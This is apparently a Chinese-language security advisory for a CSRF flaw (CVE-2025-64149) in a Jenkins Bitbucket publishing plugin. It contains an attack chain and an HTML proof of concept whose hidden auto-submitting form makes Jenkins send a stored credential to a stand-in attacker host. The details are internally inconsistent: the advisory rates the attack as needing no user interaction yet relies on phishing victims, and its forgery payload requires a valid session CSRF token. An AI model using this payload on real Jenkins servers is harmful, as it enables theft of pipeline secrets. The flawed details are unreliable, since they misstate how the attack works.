Jenkins Publish to Bitbucket Plugin CSRF漏洞导致凭证窃取

漏洞信息

漏洞编号

CVE-2025-64149

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jenkins Publish to Bitbucket Plugin

漏洞概述

Jenkins Publish to Bitbucket Plugin 0.4及更早版本存在一个严重的跨站请求伪造(CSRF)漏洞。该漏洞允许已认证的攻击者通过构造恶意请求，利用Jenkins的凭证系统，连接到攻击者指定的URL并捕获存储在Jenkins中的凭证信息。由于Jenkins通常存储着各种敏感凭证，包括API密钥、用户名密码、SSH密钥等，一旦这些凭证被窃取，攻击者可以进一步横向移动，对整个CI/CD基础设施造成严重影响。该漏洞的利用不需要用户交互，攻击者只需要在Jenkins环境中拥有低权限账号即可发起攻击。攻击者可以利用此漏洞获取更高权限的凭证，从而获得对代码仓库、部署系统和其他关键资源的未授权访问。

技术细节

该CSRF漏洞存在于Jenkins Publish to Bitbucket Plugin的凭证处理流程中。漏洞的核心问题在于插件未能正确验证HTTP请求的来源和合法性，允许攻击者通过钓鱼或社会工程学手段诱导具有适当权限的用户访问恶意页面。攻击者预先获取有效的凭证ID（可通过其他漏洞或信息泄露途径获得），然后构造一个包含目标URL和凭证ID的CSRF请求。当受害者浏览器执行该请求时，Jenkins会使用存储的凭证连接到攻击者控制的Bitbucket服务器，从而导致凭证信息被捕获。攻击者通常会搭建一个恶意的Bitbucket服务器或利用重定向技术来记录凭证数据。由于Jenkins凭证通常以加密形式存储，但插件在调用时会进行解密操作，攻击者可借此获取明文凭证。

攻击链分析

STEP 1

信息收集

攻击者通过社会工程、钓鱼攻击或其他漏洞获取Jenkins用户的低权限账号，并获取有效的凭证ID

STEP 2

搭建恶意服务器

攻击者搭建恶意的Bitbucket服务器或配置重定向，记录所有连接尝试和传输的凭证数据

STEP 3

构造CSRF请求

攻击者构造包含目标URL（恶意服务器地址）和获取到的凭证ID的CSRF攻击载荷

STEP 4

诱导用户访问

通过钓鱼邮件、恶意链接或嵌入恶意代码的网页，诱导Jenkins用户访问攻击页面

STEP 5

自动执行恶意请求

受害者浏览器自动向Jenkins服务器发送CSRF请求，触发凭证使用流程

STEP 6

凭证捕获

Jenkins插件使用存储的凭证连接到攻击者服务器，凭证信息被记录

STEP 7

横向移动

攻击者利用窃取的凭证访问Bitbucket仓库、代码库或其他资源，实施进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64149 -->
<!-- This PoC demonstrates the CSRF attack to steal Jenkins credentials -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-64149</title>
</head>
<body>
    <h1>CSRF Attack PoC for Jenkins Publish to Bitbucket Plugin</h1>
    <p>This is a demonstration of the CSRF vulnerability.</p>
    
    <!-- Auto-submit form that exploits the CSRF vulnerability -->
    <form id="csrfForm" action="http://target-jenkins:8080/plugin/publish-over-bitbucket/connect" method="POST" style="display:none;">
        <input type="hidden" name="url" value="http://attacker-controlled-server.com/fake-bitbucket">
        <input type="hidden" name="credentialsId" value="attacker-obtained-credential-id">
        <input type="hidden" name="Jenkins-CSRF-Protection" value="valid-csrf-token-from-session">
    </form>
    
    <script>
        // Auto-submit the form
        document.getElementById('csrfForm').submit();
        
        // Log when attack is executed
        console.log('CSRF attack executed for CVE-2025-64149');
    </script>
    
    <p><strong>Note:</strong> This PoC is for educational and security testing purposes only.</p>
</body>
</html>

影响范围

Jenkins Publish to Bitbucket Plugin <= 0.4

防御指南

临时缓解措施

在Jenkins安全配置中启用CSRF保护功能，确保所有API请求都包含有效的crumb令牌。对于Publish to Bitbucket Plugin，临时禁用该插件或限制其使用范围，直到官方发布安全更新。同时审查并限制存储在Jenkins中的凭证权限，避免低权限用户能够访问敏感凭证。